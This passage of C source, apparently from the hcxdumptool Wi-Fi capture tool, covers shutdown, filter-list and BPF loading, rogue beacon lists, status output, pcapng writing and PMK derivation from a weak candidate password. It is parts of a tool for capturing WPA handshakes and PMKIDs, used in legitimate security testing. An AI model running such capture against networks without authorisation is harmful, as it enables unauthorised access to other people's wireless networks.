lastauthkeyver; static char nmeatempsentence[NMEA_MAX]; static char nmeasentence[NMEA_MAX]; static char servermsg[SERVERMSG_MAX]; #ifdef DEBUG_TLS static char debugmsg[DEBUGMSG_MAX]; #endif static uint8_t reactivebeacondata[BEACONBODY_LEN_MAX]; static size_t reactivebeacondatalen; static int reactivebeacondatachanoffset; static uint8_t reactivebeaconwpaentdata[BEACONBODY_LEN_MAX]; static size_t reactivebeaconwpaentdatalen; static int reactivebeaconwpaentdatachanoffset; static uint8_t bcbeacondatahidden[BEACONBODY_LEN_MAX]; static size_t bcbeacondatahiddenlen; static int bcbeacondatahiddenchanoffset; static uint8_t bcbeacondataopen[BEACONBODY_LEN_MAX]; static size_t bcbeacondataopenlen; static int bcbeacondataopenchanoffset; /*===========================================================================*/ /*===========================================================================*/ static inline void debugprint2(int len, uint8_t *ptr1, uint8_t *ptr2, char *mesg) { static int p; fprintf(stdout, "\n%s ", mesg); for(p = 0; p < len; p++) { fprintf(stdout, "%02x", ptr1[p]); } fprintf(stdout, " "); for(p = 0; p < len; p++) { fprintf(stdout, "%02x", ptr2[p]); } fprintf(stdout, "\n"); return; } /*===========================================================================*/ static inline void debugprint(int len, uint8_t *ptr, char *mesg) { static int p; fprintf(stdout, "%s ", mesg); for(p = 0; p < len; p++) { fprintf(stdout, "%02x", ptr[p]); } fprintf(stdout, "\n"); return; } /*===========================================================================*/ static inline void serversendstatus(char *text, int len) { static int written; static uint8_t msgtype; static struct msghdr msg; static struct iovec iov[2]; if(!(((statusout &STATUS_SERVER) == STATUS_SERVER) && (fd_socket_mcsrv > 0))) return; msgtype = SERVERMSG_TYPE_STATUS; iov[0].iov_base = (void*)&msgtype; iov[0].iov_len = sizeof(msgtype); msg.msg_iov = iov; msg.msg_iovlen = 2; msg.msg_name = (struct sockaddr*)&mcsrvaddress; msg.msg_namelen = sizeof(mcsrvaddress); while(len > 0) { iov[1].iov_base = (void*)text; if(len > (SERVERMSG_MAX -SERVERMSG_HEAD_SIZE)) iov[1].iov_len = (SERVERMSG_MAX -SERVERMSG_HEAD_SIZE); else iov[1].iov_len = len; written = sendmsg(fd_socket_mcsrv, &msg, 0); if(written != (len +SERVERMSG_HEAD_SIZE)) errorcount++; len -= iov[1].iov_len; text = &text[iov[1].iov_len]; } return; } /*===========================================================================*/ static inline void serversendpcapng(uint8_t *pcapng, int len) { static int written; static int i; static uint8_t msgtype; static struct msghdr msg; static struct iovec iov[2]; if(!(((statusout &STATUS_SERVER) == STATUS_SERVER) && (fd_socket_mcsrv > 0))) return; msgtype = SERVERMSG_TYPE_PCAPNG; iov[0].iov_base = (void*)&msgtype; iov[0].iov_len = sizeof(msgtype); msg.msg_iov = iov; msg.msg_iovlen = 2; msg.msg_name = (struct sockaddr*)&mcsrvaddress; msg.msg_namelen = sizeof(mcsrvaddress); i=0; while(len > 0) { i++; iov[1].iov_base = (void*)pcapng; if(len > (SERVERMSG_MAX -SERVERMSG_HEAD_SIZE)) iov[1].iov_len = (SERVERMSG_MAX -SERVERMSG_HEAD_SIZE); else iov[1].iov_len = len; written = sendmsg(fd_socket_mcsrv, &msg, 0); if(written != (len +SERVERMSG_HEAD_SIZE)) errorcount++; len -= iov[1].iov_len; pcapng = &pcapng[iov[1].iov_len]; } return; } /*===========================================================================*/ static inline void clientrequestpcapnghead(struct sockaddr *sockaddrFrom, int sockaddrFrom_len) { static int written; static uint8_t clientstatus[2]; clientstatus[0] = SERVERMSG_TYPE_CONTROL; clientstatus[1] = SERVERMSG_CONTROL_SENDPCAPNGHEAD; written = sendto(fd_socket_mccli, clientstatus, 2, 0, (struct sockaddr*)sockaddrFrom, sockaddrFrom_len); if(written != (SERVERMSG_HEAD_SIZE +1)) { perror("clientpcapngheadrequest failed"); errorcount++; } } /*===========================================================================*/ static inline bool ismulticastip(char *ip) { return ((ntohl(inet_addr(ip)) & 0xf0000000) == 0xe0000000); } /*===========================================================================*/ /*===========================================================================*/ __attribute__ ((noreturn)) static void globalclose() { static struct ifreq ifr; static const char *gpsd_disable = "?WATCH={\"enable\":false}"; fprintf(stdout, "\nterminating...\e[?25h\n"); sync(); errorcount -= radiotaperrorcount; errorcount -= gpserrorcount; if(errorcount == 1) fprintf(stdout, "%d driver error encountered\n", errorcount); if(errorcount > 1) fprintf(stdout, "%d driver errors encountered\n", errorcount); if(radiotaperrorcount == 1) fprintf(stdout, "%d radiotap error encountered\n", radiotaperrorcount); if(radiotaperrorcount > 1) fprintf(stdout, "%d radiotap errors encountered\n", radiotaperrorcount); if(gpserrorcount == 1) fprintf(stdout, "%d GPS error encountered\n", gpserrorcount); if(gpserrorcount > 1) fprintf(stdout, "%d GPS errors encountered\n", gpserrorcount); if(((statusout &STATUS_SERVER) == STATUS_SERVER) && (fd_socket_mcsrv > 0)) serversendstatus("bye bye hcxdumptool clients...\n", sizeof ("bye bye hcxdumptool clients...\n")); if(gpiostatusled > 0) { GPIO_CLR = 1 << gpiostatusled; nanosleep(&sleepled, NULL); GPIO_SET = 1 << gpiostatusled; nanosleep(&sleepled, NULL); GPIO_CLR = 1 << gpiostatusled; nanosleep(&sleepled, NULL); GPIO_SET = 1 << gpiostatusled; nanosleep(&sleepled, NULL); } if(fd_socket > 0) { if(bpf.filter != NULL) { if(setsockopt(fd_socket, SOL_SOCKET, SO_DETACH_FILTER, &bpf, sizeof(bpf)) < 0) perror("failed to free BPF code"); } memset(&ifr, 0, sizeof(ifr)); strncpy( ifr.ifr_name, interfacename, IFNAMSIZ -1); if(ioctl(fd_socket, SIOCGIFFLAGS, &ifr) < 0) perror("failed to get interface information"); ifr.ifr_flags = 0; if(ioctl(fd_socket, SIOCSIFFLAGS, &ifr) < 0) perror("failed to set interface down"); if(ioctl(fd_socket, SIOCSIWMODE, &iwr_old) < 0) perror("failed to restore old SIOCSIWMODE"); if(ioctl(fd_socket, SIOCSIFFLAGS, &ifr_old) < 0) perror("failed to restore old SIOCSIFFLAGS and to bring interface up"); if(close(fd_socket) != 0) perror("failed to close raw socket"); } if(fd_gps > 0) { if(gpsdflag == true) { if(write(fd_gps, gpsd_disable, 23) != 23) perror("failed to terminate GPSD WATCH"); } if(close(fd_gps) != 0) perror("failed to close GPS device"); } if(fd_socket_mccli > 0) { if(ismulticastip(mcip) == true) { memset(&mcmreq, 0, sizeof(mcmreq)); mcmreq.imr_multiaddr.s_addr = inet_addr(mcip); mcmreq.imr_interface.s_addr = htonl(INADDR_ANY); if(setsockopt(fd_socket_mccli, IPPROTO_IP, IP_DROP_MEMBERSHIP, &mcmreq, sizeof(mcmreq)) < 0) perror("failed to drop ip-membership"); } if(close(fd_socket_mccli) != 0) perror("failed to close client socket"); } if(fd_socket_mcsrv > 0) { if(close(fd_socket_mcsrv) != 0) perror("failed to close server socket"); } if((fd_pcapng > 0) && (pcapngoutname != NULL) && (fd_pcapng != fd_socket_mcsrv)) { if(close(fd_pcapng) != 0) perror("failed to close PCAPNG dump file"); } if(fh_nmea != NULL) { if(fclose(fh_nmea) != 0) perror("failed to close NMEA 0183 dump file"); } if(filteraplist != NULL) free(filteraplist); if(filterclientlist != NULL) free(filterclientlist); if(aplist != NULL) free(aplist); if(rglist != NULL) free(rglist); if(rgbeaconlist != NULL) free(rgbeaconlist); if(ownlist != NULL) free(ownlist); if(pmklist != NULL) free(pmklist); if(pagidlist != NULL) free(pagidlist); if(scanlist != NULL) free(scanlist); if(bpf.filter != NULL) free(bpf.filter); if(eaptlsctx != NULL) { if(eaptlsctx->ssl != NULL) SSL_free(eaptlsctx->ssl); free(eaptlsctx); } if(poweroffflag == true) { if(system("poweroff") != 0) { fprintf(stderr, "can't power off\n"); exit(EXIT_FAILURE); } } if(rebootflag == true) { if(system("reboot") != 0) { fprintf(stderr, "can't reboot\n"); exit(EXIT_FAILURE); } } EVP_cleanup(); CRYPTO_cleanup_all_ex_data(); ERR_free_strings(); if(errorcount != 0) exit(EXIT_FAILURE); if(totflag == true) exit(USER_EXIT_TOT); exit(EXIT_SUCCESS); } /*===========================================================================*/ static inline void programmende(int signum) { if((signum == SIGINT) || (signum == SIGTERM) || (signum == SIGKILL)) wantstopflag = true; return; } /*===========================================================================*/ /*===========================================================================*/ static inline void reloadfiles(int signum) { if((signum == SIGHUP) && (filteraplistname || filterclientlistname || bpfcname || extaplistname || extapwpaentlistname)) reloadfilesflag = true; return; } /*===========================================================================*/ static inline size_t chop(char *buffer, size_t len) { static char *ptr; ptr = buffer +len -1; while(len) { if (*ptr != '\n') break; *ptr-- = 0; len--; } while(len) { if (*ptr != '\r') break; *ptr-- = 0; len--; } return len; } /*---------------------------------------------------------------------------*/ static inline int fgetline(FILE *inputstream, size_t size, char *buffer) { static size_t len; static char *buffptr; if(feof(inputstream)) return -1; buffptr = fgets (buffer, size, inputstream); if(buffptr == NULL) return -1; len = strlen(buffptr); len = chop(buffptr, len); return len; } /*===========================================================================*/ static inline void readextbeaconlist(char *listname, uint16_t akm, bool reload) { static int len; static FILE *fh_extbeacon; static macessidlist_t *zeiger; static macessidlist_t *list; static char linein[ESSID_LEN_MAX]; bool skipline; if((fh_extbeacon = fopen(listname, "r")) == NULL) { fprintf(stderr, "failed to open beacon list %s\n", listname); return; } if(beaconactiveflag == true) list = rglist; else { list = rgbeaconlist; memset(rgbeaconlist, 0, RGLIST_MAX *MACESSIDLIST_SIZE); } zeiger = list; if(reload == false) { for(; zeiger < list +RGLIST_MAX; zeiger++) { if(zeiger->timestamp == 0) break; } } gettimeofday(&tv, NULL); timestamp = ((uint64_t)tv.tv_sec *1000000) +tv.tv_usec -512; while(beaconextlistlen < BEACONEXTLIST_MAX) { if((len = fgetline(fh_extbeacon, ESSID_LEN_MAX, linein)) == -1) break; if((len == 0) || (len > 32)) continue; if((reload == true) && (beaconactiveflag == true)) { skipline = false; for(zeiger = list; zeiger < list +RGLIST_MAX; zeiger++) { if(zeiger->timestamp == 0) break; if(zeiger->essidlen != len) continue; if(memcmp(zeiger->essid, linein, len) != 0) continue; skipline = true; break; } if(skipline == true) continue; } memset(zeiger, 0, MACESSIDLIST_SIZE); zeiger->timestamp = timestamp; zeiger->count = 1; memcpy(zeiger->ap, &mac_myap, 3); zeiger->ap[3] = (mynic_ap >> 16) & 0xff; zeiger->ap[4] = (mynic_ap >> 8) & 0xff; zeiger->ap[5] = mynic_ap & 0xff; mynic_ap++; zeiger->essidlen = len; memcpy(zeiger->essid, linein, len); zeiger->akm = akm; timestamp++; zeiger++; beaconextlistlen++; } fclose(fh_extbeacon); return; } /*===========================================================================*/ static inline int readmaclist(char *listname, maclist_t *maclist, uint8_t filtermacsize) { static int len; static int c, i, o; static int entries; static maclist_t *zeiger; static FILE *fh_filter; static char linein[FILTERLIST_LINE_LEN]; entries = 0; c = 0; zeiger = maclist; if((fh_filter = fopen(listname, "r")) == NULL) { len = strlen(listname); if((len < (2 *filtermacsize)) || (len >= FILTERLIST_LINE_LEN)) { fprintf(stderr, "failed to open filter list %s\n", listname); return 0; } o = 0; for(i = 0; i < len; i++) { if(isxdigit(listname[i])) { linein[o] = listname[i]; o++; } } if(hex2bin(&linein[0x0], zeiger->mac, filtermacsize) == false) { fprintf(stderr, "failed to process filter MAC %s\n", listname); return 0; } zeiger++; entries++; return entries; } while(entries < FILTERLIST_MAX) { if((len = fgetline(fh_filter, FILTERLIST_LINE_LEN, linein)) == -1) break; if(len < (2 *filtermacsize)) { c++; continue; } if(linein[0x0] == '#') { c++; continue; } o = 0; for(i = 0; i < len; i++) { if(isxdigit(linein[i])) { linein[o] = linein[i]; o++; } } if(hex2bin(&linein[0x0], zeiger->mac, filtermacsize) == true) { zeiger++; entries++; } else fprintf(stderr, "failed to read filter list line %d: %s\n", c, linein); c++; } qsort(maclist, entries, MACLIST_SIZE, sort_maclist); fclose(fh_filter); return entries; } /*===========================================================================*/ static inline void readbpfc(char *bpfname) { static int len; static uint16_t c; static struct sock_filter *zeiger; static FILE *fh_filter; static char linein[128]; if((fh_filter = fopen(bpfname, "r")) == NULL) { fprintf(stderr, "failed to open Berkeley Packet Filter list %s\n", bpfname); return; } if((len = fgetline(fh_filter, 128, linein)) == -1) { fclose(fh_filter); fprintf(stderr, "failed to read Berkeley Packet Filter array size\n"); return; } sscanf(linein, "%"SCNu16, &bpf.len); if(bpf.len == 0) { fclose(fh_filter); fprintf(stderr, "failed to read Berkeley Packet Filter array size\n"); return; } bpf.filter = (struct sock_filter*)calloc(bpf.len, sizeof(struct sock_filter)); c = 0; zeiger = bpf.filter; while(c < bpf.len) { if((len = fgetline(fh_filter, 128, linein)) == -1) { bpf.len = 0; break; } sscanf(linein, "%" SCNu16 "%" SCNu8 "%" SCNu8 "%" SCNu32, &zeiger->code, &zeiger->jt, &zeiger->jf, &zeiger->k); zeiger++; c++; } if(bpf.len != c) fprintf(stderr, "failed to read Berkeley Packet Filter\n"); fclose(fh_filter); return; } /*===========================================================================*/ static inline void loadfiles() { if((reloadfilesflag == true) && (fd_socket > 0) && (bpf.filter != NULL)) { if(setsockopt(fd_socket, SOL_SOCKET, SO_DETACH_FILTER, &bpf, sizeof(bpf)) < 0) perror("failed to free BPF code"); if(bpf.filter != NULL) free(bpf.filter); } if(filteraplistname != NULL) filteraplistentries = readmaclist(filteraplistname, filteraplist, fimacapsize); if(filterclientlistname != NULL) filterclientlistentries = readmaclist(filterclientlistname, filterclientlist, fimacclientsize); if(bpfcname != NULL) readbpfc(bpfcname); if(extaplistname != NULL) readextbeaconlist(extaplistname, TAK_PSK, reloadfilesflag); if(extapwpaentlistname != NULL) readextbeaconlist(extapwpaentlistname, TAK_PMKSA, reloadfilesflag); if(reloadfilesflag == true) { if(bpf.len > 0) { if(setsockopt(fd_socket, SOL_SOCKET, SO_ATTACH_FILTER, &bpf, sizeof(bpf)) < 0) perror("failed to set Berkeley Packet Filter"); } reloadfilesflag = false; } return; } /*===========================================================================*/ /*===========================================================================*/ static inline void printreceivewatchdogwarnung() { static char timestring[16]; strftime(timestring, 16, "%H:%M:%S", localtime(&tv.tv_sec)); if(ptrfscanlist->channel >= 100) snprintf(servermsg, SERVERMSG_MAX, "%s %d/%d WARNING RECEIVE TIMEOUT: NO PACKETS RECEIVED SINC %ld SECONDS\n", timestring, ptrfscanlist->frequency, ptrfscanlist->channel, tv.tv_sec -tvlast_sec); else if(ptrfscanlist->channel >= 10) snprintf(servermsg, SERVERMSG_MAX, "%s %d/%d WARNING RECEIVE TIMEOUT: NO PACKETS RECEIVED SINC %ld SECONDS\n", timestring, ptrfscanlist->frequency, ptrfscanlist->channel, tv.tv_sec -tvlast_sec); else snprintf(servermsg, SERVERMSG_MAX, "%s %d/%d WARNING RECEIVE TIMEOUT: NO PACKETS RECEIVED SINC %ld SECONDS\n", timestring, ptrfscanlist->frequency, ptrfscanlist->channel, tv.tv_sec -tvlast_sec); if(((statusout &STATUS_SERVER) == STATUS_SERVER) && (fd_socket_mcsrv > 0)) serversendstatus(servermsg, strlen(servermsg)); else fprintf(stdout, "%s", servermsg); return; } /*===========================================================================*/ static inline void printtimestatus() { static char timestring[16]; strftime(timestring, 16, "%H:%M:%S", localtime(&tv.tv_sec)); if(ptrfscanlist->channel >= 100) snprintf(servermsg, SERVERMSG_MAX, "%s %d/%d ERROR:%d INCOMING:%" PRIu64 " AGE:%ld OUTGOING:%" PRIu64 " PMKIDROGUE:%d PMKID:%d M1M2ROGUE:%d M1M2:%d M2M3:%d M3M4:%d M3M4ZEROED:%d GPS:%d\n", timestring, ptrfscanlist->frequency, ptrfscanlist->channel, errorcount, incomingcount, tv.tv_sec -tvlast_sec, outgoingcount, pmkidroguecount, pmkidcount, eapolmp12roguecount, eapolmp12count, eapolmp23count, eapolmp34count, eapolmp34zeroedcount, gpscount); else if(ptrfscanlist->channel >= 10) snprintf(servermsg, SERVERMSG_MAX, "%s %d/%d ERROR:%d INCOMING:%" PRIu64 " AGE:%ld OUTGOING:%" PRIu64 " PMKIDROGUE:%d PMKID:%d M1M2ROGUE:%d M1M2:%d M2M3:%d M3M4:%d M3M4ZEROED:%d GPS:%d\n", timestring, ptrfscanlist->frequency, ptrfscanlist->channel, errorcount, incomingcount, tv.tv_sec -tvlast_sec, outgoingcount, pmkidroguecount, pmkidcount, eapolmp12roguecount, eapolmp12count, eapolmp23count, eapolmp34count, eapolmp34zeroedcount, gpscount); else snprintf(servermsg, SERVERMSG_MAX, "%s %d/%d ERROR:%d INCOMING:%" PRIu64 " AGE:%ld OUTGOING:%" PRIu64 " PMKIDROGUE:%d PMKID:%d M1M2ROGUE:%d M1M2:%d M2M3:%d M3M4:%d M3M4ZEROED:%d GPS:%d\n", timestring, ptrfscanlist->frequency, ptrfscanlist->channel, errorcount, incomingcount, tv.tv_sec -tvlast_sec, outgoingcount, pmkidroguecount, pmkidcount, eapolmp12roguecount, eapolmp12count, eapolmp23count, eapolmp34count, eapolmp34zeroedcount, gpscount); if(((statusout &STATUS_SERVER) == STATUS_SERVER) && (fd_socket_mcsrv > 0)) serversendstatus(servermsg, strlen(servermsg)); else fprintf(stdout, "%s", servermsg); return; } /*===========================================================================*/ static inline void printposition() { static char timestring[16]; strftime(timestring, 16, "%H:%M:%S", localtime(&tv.tv_sec)); if(ptrfscanlist->channel >= 100) snprintf(servermsg, SERVERMSG_MAX, "%s %d/%d INFO GPS:%s\n", timestring, ptrfscanlist->frequency, ptrfscanlist->channel, &nmeasentence[7]); else if(ptrfscanlist->channel >= 10) snprintf(servermsg, SERVERMSG_MAX, "%s %d/%d INFO GPS:%s\n", timestring, ptrfscanlist->frequency, ptrfscanlist->channel, &nmeasentence[7]); else snprintf(servermsg, SERVERMSG_MAX, "%s %d/%d INFO GPS:%s\n", timestring, ptrfscanlist->frequency, ptrfscanlist->channel, &nmeasentence[7]); if(((statusout &STATUS_SERVER) == STATUS_SERVER) && (fd_socket_mcsrv > 0)) serversendstatus(servermsg, strlen(servermsg)); else fprintf(stdout, "%s", servermsg); return; } /*===========================================================================*/ static inline void printstatusap(uint8_t *toaddr, macessidlist_t *zeiger, char *msg) { static int p, c; static char timestring[16]; static char essidstring[ESSID_LEN_MAX *2 +1]; strftime(timestring, 16, "%H:%M:%S", localtime(&tv.tv_sec)); if((zeiger->essidlen == 0) || (zeiger->essid[0] == 0)) { if(ptrfscanlist->channel >= 100) snprintf(servermsg, SERVERMSG_MAX, "%s %d/%d %02x%02x%02x%02x%02x%02x %02x%02x%02x%02x%02x%02x [HIDDEN %s]\n", timestring, ptrfscanlist->frequency, ptrfscanlist->channel, toaddr[0], toaddr[1], toaddr[2], toaddr[3], toaddr[4], toaddr[5], zeiger->ap[0], zeiger->ap[1], zeiger->ap[2], zeiger->ap[3], zeiger->ap[4], zeiger->ap[5], msg); else if(ptrfscanlist->channel >= 10) snprintf(servermsg, SERVERMSG_MAX, "%s %d/%d %02x%02x%02x%02x%02x%02x %02x%02x%02x%02x%02x%02x [HIDDEN %s]\n", timestring, ptrfscanlist->frequency, ptrfscanlist->channel, toaddr[0], toaddr[1], toaddr[2], toaddr[3], toaddr[4], toaddr[5], zeiger->ap[0], zeiger->ap[1], zeiger->ap[2], zeiger->ap[3], zeiger->ap[4], zeiger->ap[5], msg); else snprintf(servermsg, SERVERMSG_MAX, "%s %d/%d %02x%02x%02x%02x%02x%02x %02x%02x%02x%02x%02x%02x [HIDDEN %s]\n", timestring, ptrfscanlist->frequency, ptrfscanlist->channel, toaddr[0], toaddr[1], toaddr[2], toaddr[3], toaddr[4], toaddr[5], zeiger->ap[0], zeiger->ap[1], zeiger->ap[2], zeiger->ap[3], zeiger->ap[4], zeiger->ap[5], msg); if(((statusout &STATUS_SERVER) == STATUS_SERVER) && (fd_socket_mcsrv > 0)) serversendstatus(servermsg, strlen(servermsg)); else fprintf(stdout, "%s", servermsg); return; } p = 0; for(c = 0; c < zeiger->essidlen; c++) { if((zeiger->essid[c] < 0x20) || (zeiger->essid[c] > 0x7e)) essidstring[p++] = '.'; else if(zeiger->essid[c] == 0x5c) { essidstring[p++] = 0x5c; essidstring[p++] = 0x5c; } else essidstring[p++] = zeiger->essid[c]; } essidstring[p] = 0; if(ptrfscanlist->channel >= 100) snprintf(servermsg, SERVERMSG_MAX, "%s %d/%d %02x%02x%02x%02x%02x%02x %02x%02x%02x%02x%02x%02x %s [%s]\n", timestring, ptrfscanlist->frequency, ptrfscanlist->channel, toaddr[0], toaddr[1], toaddr[2], toaddr[3], toaddr[4], toaddr[5], zeiger->ap[0], zeiger->ap[1], zeiger->ap[2], zeiger->ap[3], zeiger->ap[4], zeiger->ap[5], essidstring, msg); else if(ptrfscanlist->channel >= 10) snprintf(servermsg, SERVERMSG_MAX, "%s %d/%d %02x%02x%02x%02x%02x%02x %02x%02x%02x%02x%02x%02x %s [%s]\n", timestring, ptrfscanlist->frequency, ptrfscanlist->channel, toaddr[0], toaddr[1], toaddr[2], toaddr[3], toaddr[4], toaddr[5], zeiger->ap[0], zeiger->ap[1], zeiger->ap[2], zeiger->ap[3], zeiger->ap[4], zeiger->ap[5], essidstring, msg); else snprintf(servermsg, SERVERMSG_MAX, "%s %d/%d %02x%02x%02x%02x%02x%02x %02x%02x%02x%02x%02x%02x %s [%s]\n", timestring, ptrfscanlist->frequency, ptrfscanlist->channel, toaddr[0], toaddr[1], toaddr[2], toaddr[3], toaddr[4], toaddr[5], zeiger->ap[0], zeiger->ap[1], zeiger->ap[2], zeiger->ap[3], zeiger->ap[4], zeiger->ap[5], essidstring, msg); if(((statusout &STATUS_SERVER) == STATUS_SERVER) && (fd_socket_mcsrv > 0)) serversendstatus(servermsg, strlen(servermsg)); else fprintf(stdout, "%s", servermsg); return; } /*===========================================================================*/ static void writegpwpl(uint8_t *mac) { static int c; static int cs; static char *gpwplptr; static char gpwpl[NMEA_MAX]; static const char gpgga[] = "$GPGGA"; static const char gprmc[] = "$GPRMC"; if(nmealen < 30) return; if(memcmp(&gpgga, &nmeasentence, 6) == 0) snprintf(gpwpl, NMEA_MAX-1, "$GPWPL,%.*s,%02x%02x%02x%02x%02x%02x*", 26, &nmeasentence[17], mac[0] , mac[1], mac[2], mac[3], mac[4], mac[5]); else if(memcmp(&gprmc, &nmeasentence, 6) == 0) snprintf(gpwpl, NMEA_MAX-1, "$GPWPL,%.*s,%02x%02x%02x%02x%02x%02x*", 26, &nmeasentence[19], mac[0] , mac[1], mac[2], mac[3], mac[4], mac[5]); else return; gpwplptr = gpwpl+1; c = 0; cs = 0; while(gpwplptr[c] != '*') { cs ^= gpwplptr[c]; gpwplptr++; } snprintf(gpwplptr +1, NMEA_MAX -44, "%02x", cs); fprintf(fh_nmea, "%s\n", gpwpl); return; } /*===========================================================================*/ static inline bool writecbnmea(int fd) { static int cblen; static int written; static custom_block_t *cbhdr; static total_length_t *totallength; static uint8_t cb[2048]; memset(&cb, 0, 2048); cbhdr = (custom_block_t*)cb; cblen = CB_SIZE; cbhdr->block_type = CBID; cbhdr->total_length = CB_SIZE; memcpy(cbhdr->pen, &hcxmagic, 4); memcpy(cbhdr->hcxm, &hcxmagic, 32); cblen += addoption(cb +cblen, OPTIONCODE_NMEA, nmealen, nmeasentence); cblen += addoption(cb +cblen, 0, 0, NULL); totallength = (total_length_t*)(cb +cblen); cblen += TOTAL_SIZE; cbhdr->total_length = cblen; totallength->total_length = cblen; if(fd == fd_socket_mcsrv) serversendpcapng(cb, cblen); else { written = write(fd, &cb, cblen); if(written != cblen) errorcount++; } return true; } /*===========================================================================*/ static inline void writeepbown(int fd) { static int epblen; static int written; static uint16_t padding; static total_length_t *totallenght; epbhdrown = (enhanced_packet_block_t*)epbown; epblen = EPB_SIZE; epbhdrown->block_type = EPBID; epbhdrown->interface_id = 0; epbhdrown->cap_len = packetlenown; epbhdrown->org_len = packetlenown; epbhdrown->timestamp_high = timestamp >> 32; epbhdrown->timestamp_low = (uint32_t)timestamp &0xffffffff; padding = (4 -(epbhdrown->cap_len %4)) %4; epblen += packetlenown; memset(&epbown[epblen], 0, padding); epblen += padding; epblen += addoption(epbown +epblen, SHB_EOC, 0, NULL); totallenght = (total_length_t*)(epbown +epblen); epblen += TOTAL_SIZE; epbhdrown->total_length = epblen; totallenght->total_length = epblen; if(fd == fd_socket_mcsrv) serversendpcapng(epbown, epblen); else { written = write(fd, &epbown, epblen); if(written != epblen) errorcount++; } return; } /*===========================================================================*/ static inline void writeepb(int fd) { static int epblen; static int written; static uint16_t padding; static total_length_t *totallenght; epbhdr = (enhanced_packet_block_t*)epb; epblen = EPB_SIZE; epbhdr->block_type = EPBID; epbhdr->interface_id = 0; epbhdr->cap_len = packetlen; epbhdr->org_len = packetlen; epbhdr->timestamp_high = timestamp >> 32; epbhdr->timestamp_low = (uint32_t)timestamp &0xffffffff; padding = (4 -(epbhdr->cap_len %4)) %4; epblen += packetlen; memset(&epb[epblen], 0, padding); epblen += padding; epblen += addoption(epb +epblen, SHB_EOC, 0, NULL); totallenght = (total_length_t*)(epb +epblen); epblen += TOTAL_SIZE; epbhdr->total_length = epblen; totallenght->total_length = epblen; if(fd == fd_socket_mcsrv) serversendpcapng(epb, epblen); else { written = write(fd, &epb, epblen); if(written != epblen) errorcount++; } return; } /*===========================================================================*/ static inline void writeepbown_peap(int fd, uint8_t *innerpacket, size_t innerpacketlen) { eapauth_t *eapauth; exteap_t *exteap; eapauth = (eapauth_t*)(epbown +EPB_SIZE +HDRRT_SIZE +MAC_SIZE_QOS +LLC_SIZE); exteap = (exteap_t*)innerpacket; eapauth->len = exteap->len; memcpy(epbown +EPB_SIZE +HDRRT_SIZE +MAC_SIZE_QOS +LLC_SIZE +EAPAUTH_SIZE, innerpacket, innerpacketlen); packetlenown = HDRRT_SIZE +MAC_SIZE_QOS +LLC_SIZE +EAPAUTH_SIZE +innerpacketlen; timestamp++; writeepbown(fd); return; } /*===========================================================================*/ /*===========================================================================*/ static inline bool setclientfilter(ownlist_t *zeiger) { static maclist_t *zeigerfilter; if(filtermode == FM_PROTECT) { for(zeigerfilter = filterclientlist; zeigerfilter < filterclientlist +filterclientlistentries; zeigerfilter++) { if(memcmp(zeiger->client, zeigerfilter->mac, fimacclientsize) == 0) { zeiger->status |= FILTERED; return true; } } return false; } if(filtermode == FI_ATTACK) { for(zeigerfilter = filterclientlist; zeigerfilter < filterclientlist +filterclientlistentries; zeigerfilter++) { if(memcmp(zeiger->client, zeigerfilter->mac, fimacclientsize) == 0) return false; } zeiger->status |= FILTERED; return true; } return false; } /*===========================================================================*/ static inline bool setapfilter(macessidlist_t *zeiger) { static maclist_t *zeigerfilter; if(filtermode == FM_PROTECT) { for(zeigerfilter = filteraplist; zeigerfilter < filteraplist +filteraplistentries; zeigerfilter++) { if(memcmp(zeiger->ap, zeigerfilter->mac, fimacapsize) == 0) { zeiger->status |= FILTERED; return true; } } return false; } if(filtermode == FI_ATTACK) { for(zeigerfilter = filteraplist; zeigerfilter < filteraplist +filteraplistentries; zeigerfilter++) { if(memcmp(zeiger->ap, zeigerfilter->mac, fimacapsize) == 0) return false; } zeiger->status |= FILTERED; return true; } return false; } /*===========================================================================*/ static inline uint8_t *getpmk(uint8_t essidlen, uint8_t *essid) { static pmklist_t *zeiger; for(zeiger = pmklist; zeiger < pmklist +PMKLIST_MAX; zeiger++) { if(zeiger->timestamp == 0) break; if(zeiger->essidlen != essidlen) continue; if(memcmp(zeiger->essid, essid, essidlen) != 0) continue; zeiger->timestamp = timestamp; return zeiger->pmk; } memset(zeiger, 0, PMKLIST_SIZE); zeiger->timestamp = timestamp; zeiger->essidlen = essidlen; memcpy(zeiger->essid, essid, essidlen); if(PKCS5_PBKDF2_HMAC_SHA1(weakcandidate, weakcandidatelen, essid, essidlen, 4096, 32, zeiger->pmk) == 0) return NULL; qsort(pmklist, zeiger -pmklist +1, PMKLIST_SIZE, sort_pmklist_by_time); return pmklist->pmk; } /*===========================================================================*/ static inline bool addownap(uint16_t status, uint8_t *ap) { static macessidlist_t *zeiger; for(zeiger = aplist; zeiger < aplist +APLIST_MAX; zeiger++) { if(zeiger->timestamp == 0) return false; if(memcmp(zeiger->ap, ap, 6) != 0) continue; zeiger->timestamp = timestamp; if((zeiger->status &status) >= AP_M2M3) return false; zeiger->status |= status; return true; } return true; } /*===========================================================================*/ static inline bool addown(uint8_t status, uint8_t *client, uint8_t *ap) { static ownlist_t *zeiger; for(zeiger = ownlist; zeiger < ownlist +OWNLIST_MAX; zeiger++) { if(zeiger->timestamp == 0) break; if(memcmp(zeiger->ap, ap, 6) != 0) continue; if(memcmp(zeiger->client, client, 6) != 0) continue; zeiger->timestamp = timestamp; if((zeiger->status &status) == status) return false; if(status == OW_M1M2ROGUE) { zeiger->owm1m2roguecount += 1; if(zeiger->owm1m2roguecount < owm1m2roguemax) return true; } zeiger->status |= status; return true; } memset(zeiger, 0, OWNLIST_SIZE); zeiger->timestamp = timestamp; memcpy(zeiger->ap, ap, 6); memcpy(zeiger->client, client, 6); if(status == OW_M1M2ROGUE) { zeiger->owm1m2roguecount = 1; qsort(ownlist, zeiger -ownlist +1, OWNLIST_SIZE, sort_ownlist_by_time); return true; } zeiger->status = status; qsort(ownlist, zeiger -ownlist +1, OWNLIST_SIZE, sort_ownlist_by_time); return true; } /*===========================================================================*/ static inline void gettagwpa(int wpalen, uint8_t *ieptr, tags_t *zeiger) { static int c; static wpaie_t *wpaptr; static int wpatype; static suite_t *gsuiteptr; static suitecount_t *csuitecountptr; static suite_t *csuiteptr; static int csuitecount; static suitecount_t *asuitecountptr; static suite_t *asuiteptr; static int asuitecount; wpaptr = (wpaie_t*)ieptr; wpalen -= WPAIE_SIZE; ieptr += WPAIE_SIZE; if(memcmp(wpaptr->oui, &ouimscorp, 3) != 0) return; if(wpaptr->ouitype != 1) return; #ifndef BIG_ENDIAN_HOST wpatype = wpaptr->type; #else 